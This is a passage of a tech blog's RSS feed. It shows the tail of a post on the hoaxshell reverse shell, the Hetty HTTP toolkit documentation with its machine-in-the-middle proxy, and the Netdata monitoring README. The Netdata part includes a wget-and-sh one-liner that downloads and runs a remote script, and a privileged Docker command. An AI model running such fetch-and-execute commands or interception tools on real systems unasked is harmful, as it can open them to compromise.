<p dir="auto">Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell PowerShell context.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hetty &#8211; An HTTP Toolkit For Security Research</title>
		<link>http://kostacipo.stream/hetty-an-http-toolkit-for-security-research/</link>
					<comments>http://kostacipo.stream/hetty-an-http-toolkit-for-security-research/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 06 Apr 2022 11:14:59 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Data]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[HTTP Toolkit]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2129</guid>

					<description><![CDATA[<p>Hetty is an HTTP toolkit for security research. It aims to become an open source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community. Features Machine-in-the-middle (MITM) HTTP proxy, with logs and advanced search HTTP client for manually creating/editing requests, and replay [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hetty-an-http-toolkit-for-security-research/">Hetty &#8211; An HTTP Toolkit For Security Research</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Hetty</strong> is an HTTP toolkit for security research. It aims to become an open source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community.</p>
<h2><strong>Features</strong></h2>
<ul>
<li>Machine-in-the-middle (MITM) HTTP proxy, with logs and advanced search</li>
<li>HTTP client for manually creating/editing requests, and replay proxied requests</li>
<li>Scope support, to help keep work organized</li>
<li>Easy-to-use web based admin interface</li>
<li>Project based database storage, to help keep work organized</li>
</ul>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2139.png" alt="ℹ" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Hetty is in early development. Please see the <a href="https://github.com/dstotijn/hetty/projects/1" target="_blank" rel="nofollow noopener">backlog</a> for details.</p>
<h2 id="community" class="anchor anchorWithStickyNavbar_mojV">Community<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#community" target="_blank" rel="nofollow noopener">​</a></h2>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f4ac.png" alt="💬" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <a href="https://discord.gg/3HVsj5pTFP" target="_blank" rel="noopener noreferrer nofollow">Join the Hetty Discord server</a>.</p>
<h2><a id="user-content-documentation" class="anchor" href="https://github.com/dstotijn/hetty#documentation" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Documentation</strong></h2>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f4d6.png" alt="📖" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <a href="https://hetty.xyz/" target="_blank" rel="nofollow noopener">Read the docs.</a></p>
<h2><a id="user-content-installation" class="anchor" href="https://github.com/dstotijn/hetty#installation" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Installation</strong></h2>
<p>The quickest way to install and update Hetty is via a package manager:</p>
<h2><strong>macOS</strong></h2>
<p><code>brew install hettysoft/tap/hetty</code></p>
<h2><strong>LINUX </strong></h2>
<p><code>sudo snap install hetty</code></p>
<h2><strong>WINDOWS</strong></h2>
<p><code><span class="token-line"><span class="token plain">scoop bucket add hettysoft https://github.com/hettysoft/scoop-bucket.git</span><br />
</span><span class="token-line"><span class="token plain">scoop install hettysoft/hetty</span></span></code></p>
<p>Alternatively, you can <a href="https://github.com/dstotijn/hetty/releases/latest" target="_blank" rel="noopener noreferrer nofollow">download the latest release from GitHub</a> for your OS and architecture, and move the binary to a directory in your <code>$PATH</code>. If your OS is not available for one of the package managers or not listed in the GitHub releases, you can compile from source <em>(link?)</em> or use a Docker image <em>(link?)</em>.</p>
<h2 id="run" class="anchor anchorWithStickyNavbar_mojV"><strong>Run<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#run" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>Once installed, start Hetty from the command line:</p>
<div class="codeBlockContainer_I0IT language-sh theme-code-block">
<div class="codeBlockContent_wNvx sh">
<pre class="prism-code language-sh codeBlock_jd64 thin-scrollbar" tabindex="0"><code class="codeBlockLines_mRuA"><span class="token-line"><span class="token plain">hetty</span>
</span></code></pre>
</div>
</div>
<p>When invoked without any options, this:</p>
<ul>
<li>Creates a root CA certificate and private key, stored on disk at <code>~/.hetty/</code></li>
<li>Creates a BadgerDB database, stored on disk at <code>~/.hetty/db/</code></li>
<li>Runs an HTTP server that listens on <code>0.0.0.0:8080</code>, used for proxying and serving the admin interface</li>
</ul>
<p>You should see the following console output:</p>
<div class="codeBlockContainer_I0IT language-sh theme-code-block">
<div class="codeBlockContent_wNvx sh">
<pre class="prism-code language-sh codeBlock_jd64 thin-scrollbar" tabindex="0"><code class="codeBlockLines_mRuA"><span class="token-line"><span class="token plain">2022/03/01 11:09:15 INFO [main] Hetty (v0.5.1) is running on :8080 ...</span></span><span class="token-line"><span class="token plain">2022/03/01 11:09:15 INFO [main] Get started at http://localhost:8080</span></span></code></pre>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f449.png" alt="👉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> You can now visit <a href="http://localhost:8080/" target="_blank" rel="noopener noreferrer nofollow">http://localhost:8080</a> to access the admin interface.</p>
<div class="admonition admonition-tip alert alert--success">
<div class="admonition-heading">
<h5>TIP</h5>
</div>
<div class="admonition-content">
<p>To easily use the HTTP proxy without manual setup, Hetty can invoke Chrome (if installed) on startup with the correct predefined settings, via:</p>
<div class="codeBlockContainer_I0IT language-sh theme-code-block">
<div class="codeBlockContent_wNvx sh">
<pre class="prism-code language-sh codeBlock_jd64 thin-scrollbar" tabindex="0"><code class="codeBlockLines_mRuA"><span class="token-line"><span class="token plain">hetty --chrome</span></span></code></pre>
</div>
</div>
<p>Alternatively, you can <a href="https://hetty.xyz/docs/guides/trust-root-ca" target="_blank" rel="nofollow noopener">trust the root CA certificate system wide</a>.</p>
</div>
</div>
<h2 id="create-a-project" class="anchor anchorWithStickyNavbar_mojV"><strong>Create a project<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#create-a-project" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<ol>
<li>Visit the admin interface at <a href="http://localhost:8080/" target="_blank" rel="noopener noreferrer nofollow">http://localhost:8080</a> and click “Manage Projects”.</li>
<li>Use the “New project” form to create an open new project:</li>
</ol>
<p><a href="https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232522" src="https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba.png" sizes="auto, (max-width: 1078px) 100vw, 1078px" srcset="https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba.png 1078w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-460x105.png 460w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-1024x234.png 1024w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-768x175.png 768w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-500x114.png 500w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-200x46.png 200w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-378x86.png 378w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-565x129.png 565w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-120x27.png 120w, https://hakin9.org/wp-content/uploads/2020/11/new-project-ce6c4ded1e4e9141975ba1074e25dbba-310x71.png 310w" alt="" width="1078" height="246" /></a></p>
<p>Once you have a project created and opened, any incoming HTTP requests proxied by Hetty will be logged.</p>
<h2 id="use-the-proxy" class="anchor anchorWithStickyNavbar_mojV"><strong>Use the proxy<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#use-the-proxy" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>To use Hetty’s HTTP proxy, you have several options:</p>
<ul>
<li>Run Hetty with <code>hetty --chrome</code> and use a preconfigured Chrome instance (recommended)</li>
<li>Use a browser extension like <a href="https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/" target="_blank" rel="noopener noreferrer nofollow">FoxyProxy</a> (Firefox) or <a href="https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif" target="_blank" rel="noopener noreferrer nofollow">Proxy SwitchyOmega</a> (Chrome)</li>
<li>Configure system wide HTTP proxy settings (not recommended)</li>
</ul>
<p>When using a browser extension for proxying, you can use <code>http://localhost:8080</code> as the proxy URL (unless you’ve specified a custom listen to address with the <code>--addr</code> option).</p>
<div class="admonition admonition-note alert alert--secondary">
<div class="admonition-heading">
<h5>NOTE</h5>
</div>
<div class="admonition-content">
<p>If you’re planning to use the proxy from a machine different than the one running Hetty (e.g. another device in your LAN), you’ll need to use a non-loopback network address, e.g. the IP address assigned by your DHCP server.</p>
</div>
</div>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f449.png" alt="👉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> With one of the above options, use the proxy by visiting a website to incur some logs we’ll use in the next section.</p>
<h2 id="view-proxy-logs" class="anchor anchorWithStickyNavbar_mojV"><strong>View proxy logs<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#view-proxy-logs" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>Once you’ve generated some traffic on the HTTP proxy, there should be some requests logged. Let’s review them by opening the <em>Proxy logs</em> page in the admin interface, found in the vertical menu bar on the left.</p>
</div>
</div>
<p><a href="https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232523" src="https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454.png" sizes="auto, (max-width: 3024px) 100vw, 3024px" srcset="https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454.png 3024w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-460x271.png 460w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-1024x604.png 1024w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-768x453.png 768w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-1536x906.png 1536w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-2048x1208.png 2048w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-500x295.png 500w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-200x118.png 200w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-378x223.png 378w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-565x333.png 565w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-120x71.png 120w, https://hakin9.org/wp-content/uploads/2020/11/list-proxy-logs-da39e18e661c9f899130d5bf83f2b454-310x183.png 310w" alt="" width="3024" height="1784" /></a></p>
<h3 id="copy-to-sender" class="anchor anchorWithStickyNavbar_mojV"><strong>Copy to Sender<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#copy-to-sender" target="_blank" rel="nofollow noopener">​</a></strong></h3>
<p>Use the “copy” icon next to any log entry to copy this request to the <em>Sender</em> module, allowing you to edit and resend the HTTP request:</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/11/copy-to-sender-c0dae9943ad3f00f4ec9f07dcfbbd292.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232525" src="https://hakin9.org/wp-content/uploads/2020/11/copy-to-sender-c0dae9943ad3f00f4ec9f07dcfbbd292.png" sizes="auto, (max-width: 222px) 100vw, 222px" srcset="https://hakin9.org/wp-content/uploads/2020/11/copy-to-sender-c0dae9943ad3f00f4ec9f07dcfbbd292.png 222w, https://hakin9.org/wp-content/uploads/2020/11/copy-to-sender-c0dae9943ad3f00f4ec9f07dcfbbd292-200x151.png 200w, https://hakin9.org/wp-content/uploads/2020/11/copy-to-sender-c0dae9943ad3f00f4ec9f07dcfbbd292-120x91.png 120w" alt="" width="222" height="168" /></a></p>
<h2 id="edit--send-request" class="anchor anchorWithStickyNavbar_mojV"><strong>Edit &amp; send request<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#edit--send-request" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>Browse to the <em>Sender</em> module via the vertical menu bar on the left.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232526" src="https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba.png" sizes="auto, (max-width: 3024px) 100vw, 3024px" srcset="https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba.png 3024w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-460x271.png 460w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-1024x604.png 1024w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-768x453.png 768w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-1536x906.png 1536w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-2048x1208.png 2048w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-500x295.png 500w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-200x118.png 200w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-378x223.png 378w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-565x333.png 565w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-120x71.png 120w, https://hakin9.org/wp-content/uploads/2020/11/sender-04170211c39aa4ecea1a6a7b091eabba-310x183.png 310w" alt="" width="3024" height="1784" /></a></p>
<p>At the bottom of the screen, click the request we just copied from the Proxy logs.</p>
<p>Now you can edit the method, URL, request headers and body of the request. Every time you click <em>Send</em>, a new request is sent and recorded in the history pane at the bottom of the screen.</p>
<h2 id="whats-next" class="anchor anchorWithStickyNavbar_mojV"><strong>What’s next?<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#whats-next" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>You should now be up and running with Hetty! <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f389.png" alt="🎉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Check out the <a href="https://hetty.xyz/docs/category/guides" target="_blank" rel="nofollow noopener">guides</a> for more detailed feature documentation.</p>
<h2 id="support" class="anchor anchorWithStickyNavbar_mojV"><strong>Support<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#support" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>Use <a href="https://github.com/dstotijn/hetty/issues" target="_blank" rel="noopener noreferrer nofollow">issues</a> for bug reports and feature requests, and <a href="https://github.com/dstotijn/hetty/discussions" target="_blank" rel="noopener noreferrer nofollow">discussions</a> for questions and troubleshooting.</p>
<h2 id="community" class="anchor anchorWithStickyNavbar_mojV"><strong>Community<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#community" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f4ac.png" alt="💬" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <a href="https://discord.gg/3HVsj5pTFP" target="_blank" rel="noopener noreferrer nofollow">Join the Hetty Discord server</a>.</p>
<h2 id="contributing" class="anchor anchorWithStickyNavbar_mojV"><strong>Contributing<a class="hash-link" title="Direct link to heading" href="https://hetty.xyz/docs/#contributing" target="_blank" rel="nofollow noopener">​</a></strong></h2>
<p>Want to contribute? Great! Please check the <a href="https://github.com/dstotijn/hetty/blob/main/CONTRIBUTING.md" target="_blank" rel="noopener noreferrer nofollow">Contribution Guidelines</a> for details.</p>
<p>The post <a href="http://kostacipo.stream/hetty-an-http-toolkit-for-security-research/">Hetty &#8211; An HTTP Toolkit For Security Research</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hetty-an-http-toolkit-for-security-research/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Netdata &#8211; Real-time Performance Monitoring</title>
		<link>http://kostacipo.stream/netdata-real-time-performance-monitoring/</link>
					<comments>http://kostacipo.stream/netdata-real-time-performance-monitoring/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sat, 12 Mar 2022 20:18:56 +0000</pubDate>
				<category><![CDATA[DevOps]]></category>
		<category><![CDATA[Networks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Performance Monitoring]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2125</guid>

					<description><![CDATA[<p>Netdata&#8217;s distributed, real-time monitoring Agent collects thousands of metrics from systems, hardware, containers, and applications with zero configuration. It runs permanently on all your physical/virtual servers, containers, cloud deployments, and edge/IoT devices, and is perfectly safe to install on your systems mid-incident without any preparation. You can install Netdata on most Linux distributions (Ubuntu, Debian, [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/netdata-real-time-performance-monitoring/">Netdata &#8211; Real-time Performance Monitoring</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="attachment-164233 size-164233 wp-post-image" src="https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f.jpg" sizes="auto, (max-width: 1600px) 100vw, 1600px" srcset="https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f.jpg 1600w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-460x259-1.jpg 460w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-1024x576-1.jpg 1024w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-768x432.png 768w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-1536x864-1.jpg 1536w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-500x281-1.jpg 500w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-200x113-1.jpg 200w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-378x213.png 378w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-565x318.png 565w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-120x68-1.jpg 120w, https://hakin9.org/wp-content/uploads/2020/02/80830383-b6ba2400-8b9d-11ea-9eb2-379c7eccd22f-310x174-1.jpg 310w" width="1600" height="900" /></p>
<p dir="auto">Netdata&#8217;s <strong>distributed, real-time monitoring Agent</strong> collects thousands of metrics from systems, hardware, containers, and applications with zero configuration. It runs permanently on all your physical/virtual servers, containers, cloud deployments, and edge/IoT devices, and is perfectly safe to install on your systems mid-incident without any preparation.</p>
<p dir="auto">You can install Netdata on most Linux distributions (Ubuntu, Debian, CentOS, and more), container platforms (Kubernetes clusters, Docker), and many other operating systems (FreeBSD, macOS). No <code>sudo</code> required.</p>
<p dir="auto">Netdata is designed by system administrators, DevOps engineers, and developers to collect everything, help you visualize metrics, troubleshoot complex performance problems, and make data interoperable with the rest of your monitoring stack.</p>
<p dir="auto">People get addicted to Netdata. Once you use it on your systems, there&#8217;s no going back! <em>You&#8217;ve been warned&#8230;</em></p>
<h2 dir="auto"><strong>Features</strong></h2>
<p><a href="https://hakin9.org/wp-content/uploads/2020/02/113440964-449c2180-93a2-11eb-9664-663afa1257a8.gif"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-231218" src="https://hakin9.org/wp-content/uploads/2020/02/113440964-449c2180-93a2-11eb-9664-663afa1257a8.gif" alt="" width="840" height="405" /></a></p>
<p dir="auto">Here&#8217;s what you can expect from Netdata:</p>
<ul dir="auto">
<li><strong>1s granularity</strong>: The highest possible resolution for all metrics.</li>
<li><strong>Unlimited metrics</strong>: Netdata collects all the available metrics—the more, the better.</li>
<li><strong>1% CPU utilization of a single core</strong>: It&#8217;s unbelievably optimized.</li>
<li><strong>A few MB of RAM</strong>: The highly-efficient database engine stores per-second metrics in RAM and then &#8220;spills&#8221; historical metrics to disk long-term storage.</li>
<li><strong>Minimal disk I/O</strong>: While running, Netdata only writes historical metrics and reads <code>error</code> and <code>access</code> logs.</li>
<li><strong>Zero configuration</strong>: Netdata auto-detects everything, and can collect up to 10,000 metrics per server out of the box.</li>
<li><strong>Zero maintenance</strong>: You just run it. Netdata does the rest.</li>
<li><strong>Stunningly fast, interactive visualizations</strong>: The dashboard responds to queries in less than 1ms per metric to synchronize charts as you pan through time, zoom in on anomalies, and more.</li>
<li><strong>Visual anomaly detection</strong>: Our UI/UX emphasizes the relationships between charts to help you detect the root cause of anomalies.</li>
<li><strong>Scales to infinity</strong>: You can install it on all your servers, containers, VMs, and IoT devices. Metrics are not centralized by default, so there is no limit.</li>
<li><strong>Several operating modes</strong>: Autonomous host monitoring (the default), headless data collector, forwarding proxy, store and forward proxy, central multi-host monitoring, in all possible configurations. Use different metrics retention policies per node and run with or without health monitoring.</li>
</ul>
<p dir="auto">Netdata works with tons of applications, notifications platforms, and other time-series databases:</p>
<ul dir="auto">
<li><strong>300+ system, container, and application endpoints</strong>: Collectors autodetect metrics from default endpoints and immediately visualize them into meaningful charts designed for troubleshooting. See <a href="https://learn.netdata.cloud/docs/agent/collectors/collectors" target="_blank" rel="nofollow noopener">everything we support</a>.</li>
<li><strong>20+ notification platforms</strong>: Netdata&#8217;s health watchdog sends warning and critical alarms to your <a href="https://learn.netdata.cloud/docs/monitor/enable-notifications" target="_blank" rel="nofollow noopener">favorite platform</a> to inform you of anomalies just seconds after they affect your node.</li>
<li><strong>30+ external time-series databases</strong>: Export resampled metrics as they&#8217;re collected to other <a href="https://learn.netdata.cloud/docs/export/external-databases" target="_blank" rel="nofollow noopener">local- and Cloud-based databases</a> for best-in-class interoperability.</li>
</ul>
<p><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f4a1.png" alt="💡" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Want to leverage the monitoring power of Netdata across entire infrastructure</strong>? View metrics from any number of distributed nodes in a single interface and unlock even more <a href="https://learn.netdata.cloud/docs/overview/why-netdata" target="_blank" rel="nofollow noopener">features</a> with <a href="https://learn.netdata.cloud/docs/overview/what-is-netdata#netdata-cloud" target="_blank" rel="nofollow noopener">Netdata Cloud</a>.</p>
<h2 dir="auto"><a id="user-content-get-netdata" class="anchor" href="https://github.com/netdata/netdata/stargazers#get-netdata" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Get Netdata</strong></h2>
<p dir="auto">To install Netdata from source on most Linux systems (physical, virtual, container, IoT, edge), run our <a href="https://learn.netdata.cloud/docs/agent/packaging/installer/methods/packages" target="_blank" rel="nofollow noopener">one-line installation script</a>. This script downloads and builds all dependencies, including those required to connect to <a href="https://netdata.cloud/cloud" target="_blank" rel="nofollow noopener">Netdata Cloud</a> if you choose, and enables <a href="https://learn.netdata.cloud/docs/agent/packaging/installer#nightly-vs-stable-releases" target="_blank" rel="nofollow noopener">automatic nightly updates</a> and <a href="https://learn.netdata.cloud/docs/agent/anonymous-statistics" target="_blank" rel="nofollow noopener">anonymous statistics</a>.</p>
<div class="highlight highlight-source-shell position-relative overflow-auto">
<pre>wget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh <span class="pl-k">&amp;&amp;</span> sh /tmp/netdata-kickstart.sh</pre>
<p dir="auto">To view the Netdata dashboard, navigate to <code>http://localhost:19999</code>, or <code>http://NODE:19999</code>.</p>
<h3 dir="auto"><a id="user-content-docker" class="anchor" href="https://github.com/netdata/netdata/stargazers#docker" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Docker</strong></h3>
<p dir="auto">You can also try out Netdata&#8217;s capabilities in a <a href="https://learn.netdata.cloud/docs/agent/packaging/docker/" target="_blank" rel="nofollow noopener">Docker container</a>:</p>
<div class="highlight highlight-source-shell position-relative overflow-auto">
<pre>docker run -d --name=netdata \
  -p 19999:19999 \
  -v netdataconfig:/etc/netdata \
  -v netdatalib:/var/lib/netdata \
  -v netdatacache:/var/cache/netdata \
  -v /etc/passwd:/host/etc/passwd:ro \
  -v /etc/group:/host/etc/group:ro \
  -v /proc:/host/proc:ro \
  -v /sys:/host/sys:ro \
  -v /etc/os-release:/host/etc/os-release:ro \
  --restart unless-stopped \
  --cap-add SYS_PTRACE \
  --security-opt apparmor=unconfined \
  netdata/netdata</pre>
<p dir="auto">To view the Netdata dashboard, navigate to <code>http://localhost:19999</code>, or <code>http://NODE:19999</code>.</p>
<h3 dir="auto"><a id="user-content-other-operating-systems" class="anchor" href="https://github.com/netdata/netdata/stargazers#other-operating-systems" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Other operating systems</strong></h3>
<p dir="auto">See our documentation for <a href="https://github.com/netdata/netdata/blob/master/packaging/installer/README.md#have-a-different-operating-system-or-want-to-try-another-method" target="_blank" rel="nofollow noopener">additional operating systems</a>, including <a href="https://github.com/netdata/netdata/blob/master/packaging/installer/methods/kubernetes.md" target="_blank" rel="nofollow noopener">Kubernetes</a>, <a href="https://github.com/netdata/netdata/blob/master/packaging/installer/methods/kickstart.md#native-packages" target="_blank" rel="nofollow noopener"><code>.deb</code>/<code>.rpm</code> packages</a>, and more.</p>
<h3 dir="auto"><a id="user-content-post-installation" class="anchor" href="https://github.com/netdata/netdata/stargazers#post-installation" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Post-installation</strong></h3>
<p dir="auto">When you&#8217;re finished with installation, check out our <a href="https://github.com/netdata/netdata/blob/master/docs/quickstart/single-node.md" target="_blank" rel="nofollow noopener">single-node</a> or <a href="https://github.com/netdata/netdata/blob/master/docs/quickstart/infrastructure.md" target="_blank" rel="nofollow noopener">infrastructure</a> monitoring quickstart guides based on your use case.</p>
<p dir="auto">Or, skip straight to <a href="https://github.com/netdata/netdata/blob/master/docs/configure/nodes.md" target="_blank" rel="nofollow noopener">configuring the Netdata Agent</a>.</p>
<p dir="auto">Read through Netdata&#8217;s <a href="https://learn.netdata.cloud/docs" target="_blank" rel="nofollow noopener">documentation</a>, which is structured based on actions and solutions, to enable features like health monitoring, alarm notifications, long-term metrics storage, exporting to external databases, and more.</p>
<h3 dir="auto"><a id="user-content-netdata-cloud" class="anchor" href="https://github.com/netdata/netdata/stargazers#netdata-cloud" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Netdata Cloud</strong></h3>
<p dir="auto">Netdata Cloud works with Netdata&#8217;s free, open-source monitoring agent to help you monitor and troubleshoot every layer of your systems to find weaknesses before they turn into outages. <a href="https://learn.netdata.cloud/docs/agent/claim" target="_blank" rel="nofollow noopener">Using both tools</a> can help you turn data into insights immediately.</p>
<p dir="auto"><a href="https://app.netdata.cloud/" target="_blank" rel="nofollow noopener">Get Netdata Cloud now!</a></p>
<h2 dir="auto"><a id="user-content-how-it-works" class="anchor" href="https://github.com/netdata/netdata/stargazers#how-it-works" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>How it works</strong></h2>
<p dir="auto">Netdata is a highly efficient, highly modular, metrics management engine. Its lockless design makes it ideal for concurrent operations on the metrics.</p>
